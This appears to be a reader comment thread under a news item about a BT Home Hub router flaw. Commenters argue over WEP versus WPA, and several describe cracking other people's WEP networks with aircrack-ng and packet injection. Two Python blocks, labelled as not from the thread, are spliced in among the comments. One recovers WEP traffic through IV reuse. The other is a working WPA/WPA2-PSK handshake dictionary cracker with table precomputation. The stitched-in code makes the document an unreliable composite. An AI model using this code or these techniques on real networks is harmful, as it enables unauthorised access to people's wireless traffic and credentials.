Yet another hole found in BT Wi-Fi router

Users of Britain's most popular Wi-Fi router have yet another reason to change the default settings tout de suite, and once again they have the folks in BT's security department to thank. In recent weeks, they changed the default password in the BT Home Hub, from "admin" to the device's unique serial number. In theory, this …


This topic is closed for new posts.
  1. Anonymous Coward
    Anonymous Coward

    They tested the security as well as the legal advice for Phorm/Webwise

    These are the very same people who assure us our data is secure with the Phorm/Webwise wiretap!

    BT was once a great organisation. I know, I worked there once (not implying I made it 'great'). In my opinion they are now beginning to reach rock bottom. Maybe they should be forced to remove the word British from their name.

    They don't seem to be associated with anything 'Great' that is synonymous with the term 'British'.

  2. Anonymous Coward

    What about Hardware Pairing Mode?

    Isn't the default security setting WEP plus Hardware Pairing?

    Can this be circumvented with packet sniffing and MAC spoofing? Just interested this doesn't seem to be mentioned in even the BT advisory.

  3. Anonymous Coward

    So, to recap

    They have to sit outside the mark's house, hack into their unsecureish wifi network and then hack into the homehub from the inside hoping that multicast is switched on?

    Why wouldn't they just hack the unprotected computers on the wifi network ? That's what I'd do, if I did that sort of thing ....

    Pingu, cos *nix is as unsecure as the BT Homehub out of the box (allegedly) and the dumb endusers believe it's secure.

  4. Anonymous Coward
    Anonymous Coward

    @ "Why wouldn't they just hack the unprotected computers on the network?"

    "Why wouldn't they just hack the unprotected computers on the network?"

    Because it's easier to hack the home hub. You now know exactly how to hack it, you have no idea how secure or otherwise the home pcs are.

  5. Khyle Westmoreland


    You can't flash these with DD-WRT... Linux running on a tiny box ftw!

  6. alistair millington
    Thumb Up

    Buy a proper router from a proper company.

    Nuff said.

  7. Anonymous Coward
    Anonymous Coward

    A title is required. - why???

    Reminds me of my boss's home hub router... he was having problems with it, and spoke to support, who told him to set his key to "aaaaaa...." "so it'd be easier to remember"...

    No icon, because they're crap.

  8. Edward Pearson
    Thumb Down

    Not THAT impressive.

    This of course is only useful if:

    A) You're on the LAN (and yet still need/want access to the HomeHub for some reason)

    B) The admin hasn't bothered to change the default password.

    A nice PoC, but in practice it's a white elephant.

  9. Henry


    WEP may be insecure, but I've had no-one hack into my network in the few years I've had it (I have some old non-WPA-able kit). Maybe this is because everyone will just go for the actually insecure network a door or two along from me.

    Has anyone here actually hacked into a WEP-protected network? I know it's trivial to crack in theory, but have never tried it myself.

  10. Mark

    Re: Shame...

    And it's not that great if you don't have root access on your machine: you can't take any extra procedures to secure your appliance running linux. Which is one reason why your linux router should be able to be upgraded with any other feasible linux OS. Unlike TiVo's locking of the hardware to the One Blessed Image. If the manufacturer has root and you don't, they still to some extent own it.

    For those who don't know about how to secure linux, they won't be any worse off with root being possible. But those who do will find their appliance much more worthy.

  11. Matt Thornton
    Thumb Down

    BT's security advice

    "Regularly changing the [WEP] key will reduce the risk of hacking."

    I love it. It's a bit like saying "Regularly changing the colour of your car will reduce the risk of having it stolen."

    And to think I was considering applying for BT's graduate training programme.

  12. Larry Cumber

    wep ?

    Interesting, hacking the BTHomeHub. It now gives an open room for some to get in before the administrative password is changed. Well, it would be nice for some to make money by hacking specific systems and letting the owners know they just left their back door open. <<<<We could help you change it <<<<<

  13. Anonymous Coward
    Anonymous Coward


    Yup, I've cracked one... I got bored, and there was one on the floor below me at the office (different company), and I was curious to see if it really was that easy.

    I wasn't using the latest techniques, so my sniffer had to wait a while for enough interesting packets, I didn't do anything to force them to be generated as has become the norm these days. It was a purely passive crack.

    It took a couple of weeks before I had enough logged, but once that was done, it spat out a WEP key.

    So beware the man who has a laptop tucked under his desk booted into linux. :-)

    Anon cos the thought police will say I was very naughty, even though I wandered down stairs and told them their network was insecure and handed them their own WEP key, and yes, they promptly went and secured it, by entering a new WEP key... D'oh! There's no telling some people... One day... When I'm bored again....

  14. Paul
    Black Helicopters

    changing your WEP key frequently

    well, if you must use WEP, it's perhaps the only thing you can do. snag is, even if you changed your key daily or more frequently (perhaps using aircrack to monitor your network and warn you if there had been sufficient "interesting" packets to crack your key), that'd be insufficient to keep an automated attack out since it's possible to flood the network and sniff enough packets to crack a wep key in minutes!

  15. Simon Greenwood
    Thumb Up

    Re: Shame

    I think they are - they have the Fon wi-fi sharing code in them and that is a variant of DD-WRT. I don't know if it's been hacked yet.

  16. Mark

    Using WEP

    It's enough to use WEP IMO because

    a) it means that nobody will access it thinking that it is an open hotspot

    b) WPA isn't 100% supported on older Windows OSs

    c) WPA is still kind of fiddly for noobs

    and if your stuff isn't valuable, who's going to make the attempt to crack it open?

    'course to some people, just the attempt to use "your" wireless is tantamount to breaking into your home and violating the family dog, so there's no need for any protection anyway, is there..?

  17. James

    Probably a silly question

    This is probably a silly question but isn't the device serial no also on a label on the outside? In which case if you have access to the house (eg a friend's house, go there for a party etc etc) a quick peek and you then know their router password?

  18. Anonymous Coward

    Bot Box

    I've said it before.. (24 hr, BB, and who looks at their router's task list?)

  19. Mickey Porkpies

    Henry and your WEP

    How do you know nobody has hacked your network??

  20. John Bayly
    Thumb Down

    This is the same BT

    Admittedly, BT Ireland, but when asked by my sister about problems using WEP & WPA, told her to disable encryption and rely on MAC filtering.

    As she works for a bank, and does work at home, I did point out how easy it is to sniff the data (a little demonstration telling her what her POP3 login details were did the job).

    Security isn't in their repertoire.

  21. Anonymous Coward
    Anonymous Coward

    This is bad - really bad...

    This router is now so insecure my personal data will be stolen long before it gets to Phorm.

    PS. 45 days since I filed a DPA request with BT about the Phorm trials and no response. I think it's time to talk to the Information Commissioner.

  22. Anonymous Coward
    Anonymous Coward


    Yup. One place I used to work had a WEP protected wireless AP. I was using a totally passive mode scanner, but since so many people were using it, my linux laptop kicked out the key in approximately 10 minutes.

    It's easy if you can be bothered. A few months back, so many wireless APs were shipped by default with no encryption that there was no point. Move your laptop 10 feet to the left, and you picked up ANOTHER unencrypted link. Now however, they are almost all shipping with some encryption enabled. For example, I can see about 6 Sky APs and 3 BT ones from my living room, and they are all encrypted in some way.

    This means that WEP is more likely to be attacked due to the fact that it's starting to be "the easiest option".

    A/C in case my previous place of work DO have a problem with me hacking a network I was allowed to use ;)

  23. Anonymous Coward

    @John Bayly

    There are still *banks* using POP3 with plain text password? They kinda deserve to get snorted if their IT department is that old school.

  24. Alan W. Rateliff, II
    Paris Hilton


    > It's enough to use WEP IMO because

    IMNSHO, your IMO is not very good. In fact, your argument is shit.

    > a) it means that nobody will access it thinking that it is an open hotspot

    That is the defense of the guilty. Even my parents know the difference between "someone's" open network and the open network of a WiFi hot-spot. At the very least, there are plenty of markings and "welcomes" at places with free WiFi.

    > b) WPA isn't 100% supported on older Windows OSs

    Avoiding the obvious DO NOT USE OLD BLOODY WINDOWS argument and the flames that ensue, I will simply point out that the LinkSys wireless manager did support WPA on Windows 98SE very well. Though I believe a lot of vendors are dropping Win9x and ME support, and rightly so.

    > c) WPA is still kind of fiddly for noobs

    Hogwash and shenanigans. WEP is fiddly: you cannot use the same pass phrases between vendors because of the differences in the key generation algorithms, so you have to use the 26 digit hex string. WPA is simple: you punch in the pass phrase, irrespective of vendor, and go.

    > and if your stuff isn't valuable, who's going to make the attempt to crack it open?

    Value is like beauty. Just because she is a fat chick, that does not mean you do not have the chance to get snogged. In some cases, people do not give two shits about you, they may just want your bandwidth or resources. And invariably someone forgets some part of security: sure, they set a WEP key, but they may still have the default admin password set, allowing a quick DNS entry to a nefarious server. Or perhaps using unencrypted POP3 and SMTP over a WEP connection.

    > 'course to some people, just the attempt to use "your" wireless is tantamount to breaking into your home and violating the family dog, so there's no need for any protection anyway, is there..?

    Brilliant phuqn logic, mate. Since you want to make this invalid connection, why not just leave all of your doors unlocked from now on. I mean, really, nothing you have inside is of value, so why not just let anyone parade on through? Heck, just offer up your dog while you're at it.

    Personally, I do not care if you want to spread your WiFi love around the neighborhood, but you simply cannot justify it with the "I don't got nothing to hide" or "there ain't nothing valuable here" arguments. Come up with something else, because those arguments just do not float.

    Paris, because she does not want hippies humping her dog either, and now understands just a teensy bit about security.

  25. Aodhhan


    So you don't have anything a hacker wants on your computer, so you dont care.

    Do you have people who don't like you?

    Doesn't take a lot to hack into someones computer, hide child porn, documents about stalking, plans to kill someone etc. Then call the police, and say this person tried to trade child pornography with you. Even take over his mailbox and send some things out in his behalf.

    Bingo, you go to jail for something you didn't do.

    Once you learn packet injection techniques, you can crack a WEP password in less than 5 minutes. A noob using Aircrack can do it in 1 to 3 days; depending on how often you use it and how many IV packets are available.

  26. Scott


    Use a Cable??????

  27. Mark

    Alan W. Rateliff, II

    For someone whose parents couldn't think of a name, I doubt this:

    "Even my parents know the difference between "someone's" open network and the open network of a WiFi hot-spot."

    How? When their Windows XP machine connects to the highest strength connection, there's no popup telling you which AP you're on. Does it even indicate there's been any change at all?

    So how do they know? Test every fifteen seconds?

    And as to the rest of it, it WAS MY OPINION. YOURS MAY VARY.

    Obviously with a brain like that, you'll be calling your kid Alan W Rateliff, III...

  28. Mark
    Black Helicopters

    Re: Probably a silly question

    Yeah, but they aren't a friend then, are they?

    And if they get into your house, why didn't they install a keylogger? Riffle through your underwear drawer? Steal your panties?

    Sheesh. People call ME paranoid!

  29. Mark

    @Anonymous Coward

    No, by far the easiest connection to hack is the open one without a password or PIN.

    When you crack a closed WEP, how do you know that they aren't collecting your location and MAC number, getting the police to pop over and take you out for illegal access? When you access, how do you know that their computer isn't logging you to see where you go? Checking YOUR computer to see what's in there?

    Anyone here EVER heard of the word "Honeypot"?

    If you're doing something nefarious, don't do it "just because I can": that's why so many morons are in jail.

  30. Anonymous Coward

    @Using WEP

    I've heard this line of argument before from people who didn't see why they should have to bother with a firewall or antivirus on their PC.

    >"and if your stuff isn't valuable, who's going to make the attempt to crack it open?"

    And I suppose you leave your car unlocked outside your house with the keys dangling out of the ignition because "Who's going to want to steal it"? How suicidally dumb can you get? "Any random thief or joyrider", that's who's going to make the attempt, and the same goes for your PC.

    Hell, your PC is probably sitting there right now pumping out spam by the million because of your stupid and complacently ignorant attitude. Get your bloody head out of the sand.

  31. Alan W. Rateliff, II
    Paris Hilton


    Nah, I am particular to "Nolan," myself.

    Interesting, though, that your brain is geared towards avoiding the argument with a "your mom" attack. Splendid work.

    To address the one real question you had, Windows XP does a good job of indicating differing wireless networks, provided they are configured differently. The general rule of thumb, which even my and others' parents understand, is that common names (like "linksys", "default", "netgear", etc.) are not permissible. The name should be something indicative of its actual use.

    "AT&T Wireless," or "T-Mobile HotSpot," or "Free for Airport Use," or of similar ilk. Sure, someone can deliberately defeat this wit by naming his or her SSID something along those lines, but one should still be suspicious and scrutinize what he or she sees, rather than just take things for face value and plunge ahead with reckless abandon.

    And I respect your opinion, I just think your argument is shit. Which, as well indicated, is my opinion as well, so cool your flames.

    Paris, because she respects the "rule of thumb" as well.

  32. Henry

    @Mickey Porkpies

    Because I restrict access based on MAC address, and tie MAC addresses to IP addresses, and my machines are always connected. Thus you'd have to spoof a MAC address to get in, which I'd notice quite quickly when the machine that really has that MAC address starts misbehaving.

  33. Anonymous Coward
    Anonymous Coward

    Re: get a proper router

    If you want to make full use of your BT Broadband package, you do need to use a BT Hub.

    Services like BT FON and Broadband Talk (BT's VOIP service) rely on it. Also, if you have BT Vision, you won't get a QOS session needed for the video-on-demand service if you use a different router.

    I've been using a BT hub since last Summer and haven't had any major problems. I have to confess I only got round to switching to WPA in the past day or so.

  34. Vertigo

    WEP is totally dead!

    Even complicated WEP keys are broken in 30 sec. using the aircrack-ng tool in PTW mode from BackTrack. That pertains to Open authentication. Shared Key authentication key search is more complicated: it requires the associated victim STA's MAC address to perform a deauthentication first, to capture the WEP 4-way authentication handshake, but it also works perfectly! Worse, I can crack dynamic WEP keys with 802.1X authentication!! Thanks to the PTW guys! WPA-PSK authentication with a complicated shared secret (at least a 20-character pre-shared password) helps.
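
The common thread in comments 14, 25 and 34 is that a passive WEP crack is a matter of collecting enough frames. The example below is added here to show the simplest reason why; it is not code from the article or from any of the posters. WEP keys RC4 with IV||key, sends the 24-bit IV in the clear, and so any two frames that share an IV share a keystream, letting an attacker recover one payload from another without ever learning the key. The key, IVs and payloads are constructed for the demonstration, and the CRC-32 ICV that real WEP appends before encrypting is left out; the FMS/PTW attacks that aircrack-ng uses need far fewer frames than the birthday bound computed here, which is why the thread's "30 seconds" figure is plausible.

```python
"""
Added example (not from the article or the comments): why "enough IVs" cracks WEP.
WEP = RC4 keyed with IV||key, 24-bit IV sent in the clear. Two frames with the
same IV share a keystream. All keys, IVs and payloads below are constructed.
"""
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). WEP's only change is prepending the IV to the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Simplified WEP frame body: cleartext 3-byte IV, then RC4(IV||key) over the payload.
    Real WEP also appends a CRC-32 ICV before encrypting; omitted here."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + key, payload)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_from_iv_reuse(frame_a: bytes, frame_b: bytes, known_a: bytes) -> bytes:
    """Two frames with the same IV satisfy C_a ^ C_b == P_a ^ P_b; no key involved.

    Knowing P_a (WEP payloads start with a fixed LLC/SNAP header, and ARP
    requests are almost fully predictable) yields the keystream prefix and
    therefore the same prefix of P_b. Returns the recovered prefix of P_b.
    """
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames do not share an IV; their keystreams differ")
    n = min(len(frame_a), len(frame_b), len(known_a) + 3) - 3
    keystream = _xor(frame_a[3:3 + n], known_a[:n])
    return _xor(frame_b[3:3 + n], keystream)


def frames_until_iv_repeat(probability: float, iv_bits: int = 24) -> int:
    """Birthday bound: frames a passive sniffer needs before some IV repeats with
    the given probability, assuming the card picks IVs at random. Cards that
    count up repeat deterministically after 2**24 frames instead."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


def demo() -> bytes:
    """Constructed scenario: a card reuses one IV for an ARP request and a later
    HTTP frame; the attacker knows the ARP bytes and reads the HTTP prefix."""
    key = b"\x0b\xad\xc0\xff\xee"                     # constructed 40-bit WEP key
    iv = b"\x13\x37\x42"                              # constructed IV, reused by the card
    arp_request = (b"\xaa\xaa\x03\x00\x00\x00\x08\x06"  # LLC/SNAP + EtherType ARP
                   b"\x00\x01\x08\x00\x06\x04\x00\x01")  # fixed ARP header fields
    secret = b"\xaa\xaa\x03\x00\x00\x00\x08\x00GET /webmail"  # constructed second payload
    frame_a = wep_encrypt(key, iv, arp_request)
    frame_b = wep_encrypt(key, iv, secret)
    return recover_from_iv_reuse(frame_a, frame_b, arp_request)
```

`frames_until_iv_repeat(0.5)` comes out at a few thousand frames, which is why the "change the key regularly" advice quoted in comment 11 cannot keep up with a busy network; an injected ARP replay (comment 25) generates that many frames in seconds.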

  35. Anonymous Coward
    Anonymous Coward

    @ Henry

    Yes, I've cracked one. And WPA (and WPA2 as well) - they're all relatively trivial (though the WPA family is an order of magnitude more resource intensive than WEP)

    Thing about WPA/WPA2's security is that the SSID and key are related. You can either throw massive amounts of CPU time at the problem and use the SSID to compromise the key, or you can use massive precomputed tables with common SSIDs and common passwords, and the resulting key - effectively throwing disk space at the problem.

    (Note that turning SSID broadcast off only stops ACTIVE sniffing, which isn't the preferred method of network discovery at all - if there's any data on the network at all, the SSID is being broadcast with every packet)

    Turns out that setting your SSID to something that looks like a strong(ish) password is actually a useful security measure - it pretty much guarantees your SSID won't fall into one of those tables (though given enough time, or enough luck, it's still cake) - at least until disk prices drop farther.

    Bottom line: Your data is not safe over the air no matter what encryption you're using.
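
The comment above is right that SSID and passphrase are tied together, and the example below is added to show exactly how; it is not code from the article or from the commenter. The key derivation is the 802.11i one (PBKDF2-HMAC-SHA1 with the SSID as salt, then PRF-512 to a PTK whose first 16 bytes authenticate the EAPOL handshake); the handshake itself (MACs, nonces, EAPOL body) is constructed in the script rather than captured, and the wordlist is a stand-in for a real one. The attacker's only unknown is the passphrase, so each candidate is tested by re-deriving the MIC and comparing it with the captured one; a table precomputed for one SSID is worthless against another, which is the reason the thread gives for choosing an unusual SSID.

```python
"""
Added example (not from the article or the comments): the offline WPA/WPA2-PSK
dictionary attack and why the SSID acts as a salt. The KDFs are the 802.11i
ones; the handshake values below are constructed, not captured.
"""
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so a (passphrase -> PMK) table is valid for one SSID only."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i. Everything here besides the PMK is visible on the air."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]  # bytes 0..15 are the KCK, which authenticates the EAPOL-Key frames


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed:
    HMAC-SHA1 truncated to 16 bytes for WPA2/CCMP, HMAC-MD5 for WPA/TKIP."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def capture(passphrase: str, ssid: str) -> dict:
    """Stand-in for a sniffed 4-way handshake: what a supplicant with the true
    passphrase would put on the air. All values are constructed."""
    hs = {
        "ssid": ssid,
        "ap_mac": bytes.fromhex("001122334455"),   # constructed BSSID
        "sta_mac": bytes.fromhex("66778899aabb"),  # constructed client MAC
        "anonce": bytes(range(32)),                # constructed nonces
        "snonce": bytes(range(32, 64)),
    }
    # EAPOL-Key message 2 body with the 16-byte MIC field zeroed (constructed layout)
    hs["eapol"] = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8 + hs["snonce"] + b"\x00" * 32
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, hs["eapol"])
    return hs


def precompute(ssid: str, wordlist) -> dict:
    """The 'throw disk at it' approach: PMKs for common passphrases under ONE SSID."""
    return {pw: wpa_pmk(pw, ssid) for pw in wordlist}


def crack(hs: dict, wordlist, table=None):
    """For each candidate: PMK (computed, or looked up in a precomputed table),
    then KCK, then MIC; only the right (passphrase, SSID) pair reproduces the
    captured MIC. Returns the passphrase or None."""
    for pw in wordlist:
        pmk = table[pw] if table is not None and pw in table else wpa_pmk(pw, hs["ssid"])
        kck = wpa_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return pw
    return None
```

Run `crack(capture("password", "linksys"), words, precompute("linksys", words))` and the lookup succeeds; run the same table against a handshake from an SSID it was not built for and every candidate fails, forcing the attacker back to 4096 PBKDF2 iterations per guess. That cost, not the SSID, is the real defence, and it only holds if the passphrase is not in anyone's wordlist.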

  36. Henry


    Well, quite. Which is why the bottom line is: don't have a single point of failure, and make sure that even if someone does crack the wireless bit of the network then they'll have to do lots more work to do anything once they're in.

  37. John A Thomson
    IT Angle

    Shame BT haven't told... em... BT

    It is just a shame that BT Installation Engineers and their telephone support staff may still be using the default WEP out-of-the-box set-up!!! Well that was the case one month ago when their own website had advisories stating WEP bad, use WPA instead.

    More info:

  38. Hate2Register

    "The typical Reg reader should have no trouble with security.."

    I'll give you a bagel, might go with the brown nose you've got up my butt.

  39. Mark

    Re: AC "Using WEP"

    "Hell, your PC is probably sitting there right now pumping out spam by the million because of your stupid and complacently ignorant attitude. Get your bloody head out of the sand."

    Well, not really. There aren't any bots that run on a Nokia N800 that I know of. My real PCs are wired up, and the wireless is only for browsing the internet, reading mail and similar stuff on a machine that

    a) is running Linux

    b) is very underpowered

    c) isn't x86

    d) isn't on much at all

    Not an easy target.

    I have a laptop too, but that connects using SSH with shared keys, is running linux too, has a firewall and isn't on 24/7.

    And having a firewall on the PC with windows is practically mandated now. That'll stop botnets getting on unless you keep clicking on those popups (use FF/AdBlock/Flashnot/et al).

    Now that you know you JUMPED to a conclusion, you gonna say sorry? Or just fuck off home?

  40. Mark

    @Alan III

    "To address the one real question you had, Windows XP does a good job of indicating wireless differing wireless networks, provided they are configured differently."

    Shall I point out the important words here:

    "provided they are configured differently."

    That requires that the OTHER person's WiFi AP is configured for YOUR use.

    See a problem there?

    Your parents knowing the open point is really supposed to be open depends on the owner of the open point to set it the way THEY understand it to mean "this is an open AP".

    A bit hard for people to know what your parents think, isn't it?
